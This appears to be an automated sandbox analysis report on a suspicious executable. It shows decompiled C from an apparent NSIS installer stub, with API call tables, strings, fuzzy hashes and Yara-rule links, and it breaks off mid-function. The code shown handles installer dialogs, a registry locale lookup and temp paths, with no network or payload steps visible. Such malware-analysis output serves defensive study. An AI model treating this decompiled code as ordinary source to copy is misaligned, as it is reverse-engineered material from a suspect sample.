                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0291160D, Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.220670913.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004038DB, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 347windowstringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E004038DB(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x42a88c = _t33;
					if(_t135 == 0x110) {
						 *0x42f424 = _t117;
						 *0x42a89c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429868 = _t89;
						E00403DC3(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x42ec08);
						 *0x42ebec = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x42a88c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x42f440;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403E0F(0x40b);
						while(1) {
							_t35 =  *0x42a88c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x42f444;
							if(_t37 ==  *0x42f444) {
								E00401410(1);
							}
							__eflags =  *0x42ebec;
							if( *0x42ebec != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x42f444; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x437000);
							E004059FD(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DC3(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DC3(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DC3(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x42f4ac;
							_t136 = _t47;
							if( *0x42f4ac != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DE5(_t122 & 0x00000002);
							EnableWindow( *0x429868, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x42f4ac;
							if( *0x42f4ac == 0) {
								_push( *0x42a89c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x429868);
							}
							E00403DF8();
							E004059DB(0x42a8a0, "obsolete Setup");
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x42a8a0[lstrlenA(0x42a8a0)]));
							E004059FD(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x42a8a0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)), 0);
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x42ebf8);
									 *0x42a078 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x42f420,  *_t132 +  *0x42ec00 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x42ebf8 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DC3(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x42ebf8, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)), 0);
											ShowWindow( *0x42ebf8, 8);
											E00403E0F(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x42f4ac - _t65;
								if( *0x42f4ac != _t65) {
									goto L61;
								}
								__eflags =  *0x42f4a0 - _t65;
								if( *0x42f4a0 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f424 =  *0x42f424 & 0x00000000;
						__eflags =  *0x42f424;
						EndDialog(_t117,  *0x429c70);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)), 0);
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x42a880, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a880,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E2A(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x42ebf8, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x42f4ac;
											if( *0x42f4ac == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x429c70 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D9C();
												goto L30;
											}
											E00401410(_t134);
											 *0x429c70 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x42f444 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x429868);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _a12;
						L58:
						if( *0x42b8a0 == 0 &&  *0x42ebf8 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x42b8a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























                                                                          0x004038e5
                                                                          0x004038ed
                                                                          0x00403a66
                                                                          0x00403a6a
                                                                          0x00403a6e
                                                                          0x00403a70
                                                                          0x00403a75
                                                                          0x00403a80
                                                                          0x00403a8b
                                                                          0x00403a90
                                                                          0x00403a92
                                                                          0x00403a94
                                                                          0x00403a97
                                                                          0x00403a9c
                                                                          0x00403aaa
                                                                          0x00403ab7
                                                                          0x00403abe
                                                                          0x00403abe
                                                                          0x00403abf
                                                                          0x00403abf
                                                                          0x00403ac4
                                                                          0x00403ad1
                                                                          0x00403ad7
                                                                          0x00403ad9
                                                                          0x00403b19
                                                                          0x00403b1e
                                                                          0x00403b23
                                                                          0x00403b23
                                                                          0x00403b28
                                                                          0x00403b31
                                                                          0x00403b33
                                                                          0x00403b38
                                                                          0x00403b3e
                                                                          0x00403b42
                                                                          0x00403b42
                                                                          0x00403b47
                                                                          0x00403b4e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403b59
                                                                          0x00403b5f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403b65
                                                                          0x00403b68
                                                                          0x00403b6b
                                                                          0x00403b70
                                                                          0x00403b75
                                                                          0x00403b78
                                                                          0x00403b7e
                                                                          0x00403b83
                                                                          0x00403b86
                                                                          0x00403b8c
                                                                          0x00403b91
                                                                          0x00403b94
                                                                          0x00403b9a
                                                                          0x00403ba2
                                                                          0x00403ba8
                                                                          0x00403baf
                                                                          0x00403bb1
                                                                          0x00403bb8
                                                                          0x00403bb8
                                                                          0x00403bb8
                                                                          0x00403bc2
                                                                          0x00403bd1
                                                                          0x00403bdd
                                                                          0x00403bec
                                                                          0x00403c03
                                                                          0x00403c05
                                                                          0x00403c0b
                                                                          0x00403c20
                                                                          0x00403c0d
                                                                          0x00403c16
                                                                          0x00403c18
                                                                          0x00403c18
                                                                          0x00403c26
                                                                          0x00403c36
                                                                          0x00403c3b
                                                                          0x00403c46
                                                                          0x00403c47
                                                                          0x00403c4e
                                                                          0x00403c58
                                                                          0x00403c5d
                                                                          0x00403c5f
                                                                          0x00000000
                                                                          0x00403c65
                                                                          0x00403c65
                                                                          0x00403c67
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403c6d
                                                                          0x00403c71
                                                                          0x00403c96
                                                                          0x00403c9c
                                                                          0x00403ca2
                                                                          0x00403ca5
                                                                          0x00403ccb
                                                                          0x00403cd1
                                                                          0x00403cd3
                                                                          0x00403cd8
                                                                          0x00403cde
                                                                          0x00403ce1
                                                                          0x00403ce4
                                                                          0x00403cfb
                                                                          0x00403d07
                                                                          0x00403d22
                                                                          0x00403d2c
                                                                          0x00403d39
                                                                          0x00403d44
                                                                          0x00403d44
                                                                          0x00403cd8
                                                                          0x00000000
                                                                          0x00403ca5
                                                                          0x00403c73
                                                                          0x00403c79
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403c7f
                                                                          0x00403c85
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403c8b
                                                                          0x00403c5f
                                                                          0x00403d51
                                                                          0x00403d5d
                                                                          0x00403d5d
                                                                          0x00403d65
                                                                          0x00000000
                                                                          0x00403adb
                                                                          0x00403adb
                                                                          0x00403ade
                                                                          0x00403b11
                                                                          0x00403b11
                                                                          0x00403b13
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403b13
                                                                          0x00403ae4
                                                                          0x00403ae9
                                                                          0x00403aeb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403afb
                                                                          0x00403b03
                                                                          0x00000000
                                                                          0x00403b09
                                                                          0x004038ff
                                                                          0x004038ff
                                                                          0x00403906
                                                                          0x00403917
                                                                          0x00403917
                                                                          0x00403920
                                                                          0x00403929
                                                                          0x00403934
                                                                          0x00403934
                                                                          0x00403940
                                                                          0x0040395c
                                                                          0x0040395f
                                                                          0x00403974
                                                                          0x00403977
                                                                          0x004039ac
                                                                          0x004039ac
                                                                          0x004039b2
                                                                          0x00403a53
                                                                          0x00000000
                                                                          0x00403a5c
                                                                          0x004039b8
                                                                          0x004039cb
                                                                          0x004039cd
                                                                          0x004039cf
                                                                          0x004039ec
                                                                          0x004039ef
                                                                          0x004039f1
                                                                          0x004039f6
                                                                          0x004039f9
                                                                          0x00403a08
                                                                          0x00403a0b
                                                                          0x00403a3e
                                                                          0x00403a51
                                                                          0x00000000
                                                                          0x00403a51
                                                                          0x00403a0d
                                                                          0x00403a14
                                                                          0x00403a2d
                                                                          0x00403a32
                                                                          0x00403a34
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403a36
                                                                          0x00403a22
                                                                          0x00403a22
                                                                          0x00403a24
                                                                          0x00403a24
                                                                          0x00000000
                                                                          0x00403a24
                                                                          0x00403a17
                                                                          0x00403a1c
                                                                          0x00000000
                                                                          0x00403a1c
                                                                          0x004039fb
                                                                          0x00403a02
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403a04
                                                                          0x00000000
                                                                          0x00403a04
                                                                          0x004039f3
                                                                          0x00000000
                                                                          0x004039f3
                                                                          0x004039db
                                                                          0x004039de
                                                                          0x004039e4
                                                                          0x004039e6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004039e6
                                                                          0x0040397f
                                                                          0x00403985
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403991
                                                                          0x00403997
                                                                          0x00403999
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040399f
                                                                          0x004039a4
                                                                          0x00000000
                                                                          0x004039a4
                                                                          0x00403966
                                                                          0x00000000
                                                                          0x00403942
                                                                          0x00403948
                                                                          0x00403952
                                                                          0x00403d6b
                                                                          0x00403d72
                                                                          0x00403d80
                                                                          0x00403d86
                                                                          0x00403d86
                                                                          0x00403d90
                                                                          0x00000000
                                                                          0x00403d90
                                                                          0x00403940

                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403917
                                                                          • ShowWindow.USER32(?), ref: 00403934
                                                                          • DestroyWindow.USER32 ref: 00403948
                                                                          • SetWindowLongA.USER32 ref: 00403966
                                                                          • IsWindowEnabled.USER32 ref: 00403991
                                                                          • GetDlgItem.USER32 ref: 004039BF
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039DB
                                                                          • IsWindowEnabled.USER32(00000000), ref: 004039DE
                                                                          • GetDlgItem.USER32 ref: 00403A86
                                                                          • GetDlgItem.USER32 ref: 00403A90
                                                                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AAA
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AFB
                                                                          • GetDlgItem.USER32 ref: 00403BA2
                                                                          • ShowWindow.USER32(00000000,?), ref: 00403BC2
                                                                          • EnableWindow.USER32(00000000,?), ref: 00403BD1
                                                                          • EnableWindow.USER32(?,?), ref: 00403BEC
                                                                          • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403C03
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C16
                                                                          • lstrlenA.KERNEL32(0042A8A0,?,0042A8A0,obsolete Setup), ref: 00403C3F
                                                                          • SetWindowTextA.USER32(?,0042A8A0), ref: 00403C4E
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403D80
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                          • String ID: obsolete Setup
                                                                          • API String ID: 3950083612-4232858581
                                                                          • Opcode ID: 5a0ec1d2c6c6a67fdf7c0c6a9d68d5a67aa73794bec358b76895f6c853a45a70
                                                                          • Instruction ID: 006876bbb85f53b20e6cd7df4346cbfae3e875a0e3379fd521061c3a37ebfb4f
                                                                          • Opcode Fuzzy Hash: 5a0ec1d2c6c6a67fdf7c0c6a9d68d5a67aa73794bec358b76895f6c853a45a70
                                                                          • Instruction Fuzzy Hash: 59C1A071604201ABDB30AF26ED45F273EACEB44716F80093AF556B51F1D678A942CB1E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403542, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 89%
                                                                          			E00403542() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x42f428;
				_t20 = E00405CEE("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x42a8a0;
					"1033" = 0x7830;
					E004058CF(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8a0);
					__eflags =  *0x42a8a0;
					if(__eflags == 0) {
						E004058CF(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x42a8a0);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405939("1033",  *_t20() & 0x0000ffff);
				}
				E0040380E(_t75, _t88);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42f4a0 =  *0x42f430 & 0x00000020;
				if(E004055C8(_t88, _t84) != 0) {
					L16:
					if(E004055C8(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059FD(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec08 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E0040380E(_t75, __eflags);
							__eflags =  *0x42f4c0;
							if( *0x42f4c0 != 0) {
								_t31 = E00404E50(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a880, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x42ebc0);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x42ebc0);
								 *0x42ebe4 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x42ebc0);
							}
							_t39 =  *0x42ec00; // 0x0
							_t42 = DialogBoxParamA( *0x42f420, _t39 + 0x00000069 & 0x0000ffff, 0, E004038DB, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42f420;
						 *0x42ebd4 = _t28;
						_v20 = 0x624e5f;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebe4 =  &_v20;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a880 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x42e3c0;
					E004058CF( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x42f458, 0x42e3c0);
					_t61 =  *0x42e3c0; // 0x48
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42e3c1;
						 *((char*)(E00405513(0x42e3c1, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059DB(_t84, E004054E8(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E0040552F(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}




























                                                                          0x00403548
                                                                          0x00403559
                                                                          0x00403560
                                                                          0x00403562
                                                                          0x00403576
                                                                          0x0040357b
                                                                          0x00403591
                                                                          0x00403596
                                                                          0x0040359c
                                                                          0x004035ae
                                                                          0x004035ae
                                                                          0x004035b9
                                                                          0x00403564
                                                                          0x0040356f
                                                                          0x0040356f
                                                                          0x004035be
                                                                          0x004035c8
                                                                          0x004035d1
                                                                          0x004035dd
                                                                          0x00403663
                                                                          0x0040366b
                                                                          0x0040366d
                                                                          0x00403673
                                                                          0x00403674
                                                                          0x00403674
                                                                          0x0040368a
                                                                          0x00403690
                                                                          0x0040369e
                                                                          0x0040372d
                                                                          0x00403735
                                                                          0x0040373f
                                                                          0x00403744
                                                                          0x0040374a
                                                                          0x004037dc
                                                                          0x004037e1
                                                                          0x004037e3
                                                                          0x004037ff
                                                                          0x00000000
                                                                          0x004037ff
                                                                          0x004037e5
                                                                          0x004037eb
                                                                          0x004037f3
                                                                          0x004037f3
                                                                          0x00000000
                                                                          0x004037eb
                                                                          0x00403758
                                                                          0x00403764
                                                                          0x0040376a
                                                                          0x0040376c
                                                                          0x0040376e
                                                                          0x00403771
                                                                          0x0040377a
                                                                          0x0040377a
                                                                          0x00403782
                                                                          0x0040378a
                                                                          0x0040378c
                                                                          0x0040378e
                                                                          0x00403793
                                                                          0x00403799
                                                                          0x0040379c
                                                                          0x004037a2
                                                                          0x004037a9
                                                                          0x004037a9
                                                                          0x004037af
                                                                          0x004037c8
                                                                          0x004037d2
                                                                          0x00000000
                                                                          0x004037d7
                                                                          0x00403737
                                                                          0x00403739
                                                                          0x00000000
                                                                          0x004036a4
                                                                          0x004036a4
                                                                          0x004036aa
                                                                          0x004036b4
                                                                          0x004036bc
                                                                          0x004036c6
                                                                          0x004036cc
                                                                          0x004036da
                                                                          0x00403804
                                                                          0x00403804
                                                                          0x00000000
                                                                          0x00403804
                                                                          0x004036e0
                                                                          0x004036e9
                                                                          0x00403728
                                                                          0x00000000
                                                                          0x00403728
                                                                          0x004035e3
                                                                          0x004035e3
                                                                          0x004035e8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004035f2
                                                                          0x00403601
                                                                          0x00403606
                                                                          0x0040360d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403611
                                                                          0x00403613
                                                                          0x00403620
                                                                          0x00403620
                                                                          0x00403628
                                                                          0x0040362e
                                                                          0x00403656
                                                                          0x0040365e
                                                                          0x00000000
                                                                          0x00403640
                                                                          0x00403641
                                                                          0x0040364a
                                                                          0x00403650
                                                                          0x00403651
                                                                          0x00000000
                                                                          0x00403651
                                                                          0x0040364c
                                                                          0x0040364e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040364e
                                                                          0x0040362e

                                                                          APIs
                                                                            • Part of subcall function 00405CEE: GetModuleHandleA.KERNEL32(000000F1,00405736,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405CF2
                                                                            • Part of subcall function 00405CEE: LoadLibraryA.KERNEL32(000000F1,?,?,004054D8,?,00000000,000000F1,?), ref: 00405D00
                                                                            • Part of subcall function 00405CEE: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405D0F
                                                                          • lstrcatA.KERNEL32(1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 004035B9
                                                                          • lstrlenA.KERNEL32(Hyvkfcorf,?,?,?,Hyvkfcorf,C:\Users\user\AppData\Local\Temp,1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 00403623
                                                                          • lstrcmpiA.KERNEL32(?,.exe,Hyvkfcorf,?,?,?,Hyvkfcorf,C:\Users\user\AppData\Local\Temp,1033,0042A8A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8A0,KERNEL32.dll,GetUserDefaultUILanguage), ref: 00403636
                                                                          • GetFileAttributesA.KERNEL32(Hyvkfcorf), ref: 00403641
                                                                          • LoadImageA.USER32 ref: 0040368A
                                                                          • RegisterClassA.USER32 ref: 004036D1
                                                                            • Part of subcall function 00405939: wsprintfA.USER32 ref: 00405946
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036E9
                                                                          • CreateWindowExA.USER32 ref: 00403722
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403758
                                                                          • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040376A
                                                                          • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040377A
                                                                          • GetClassInfoA.USER32 ref: 0040378A
                                                                          • GetClassInfoA.USER32 ref: 00403799
                                                                          • RegisterClassA.USER32 ref: 004037A9
                                                                          • DialogBoxParamA.USER32 ref: 004037C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\LWlcpDjYIQ.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Hyvkfcorf$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                                                          • API String ID: 914957316-4152032813
                                                                          • Opcode ID: d176114afbd04041798e0cb44c6bd170754ede8e8114513eb1934af700cf44d0
                                                                          • Instruction ID: 60d3dd17ab41db2a81a331a2e75007f0283db07517ec3cfb703c1e7772151899
                                                                          • Opcode Fuzzy Hash: d176114afbd04041798e0cb44c6bd170754ede8e8114513eb1934af700cf44d0
                                                                          • Instruction Fuzzy Hash: C161D5B1604200BFD720BF669C45E273EACEB44759F80457FF941B22E2D778A9058A7E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403F0B, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 93%
                                                                          			E00403F0B(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
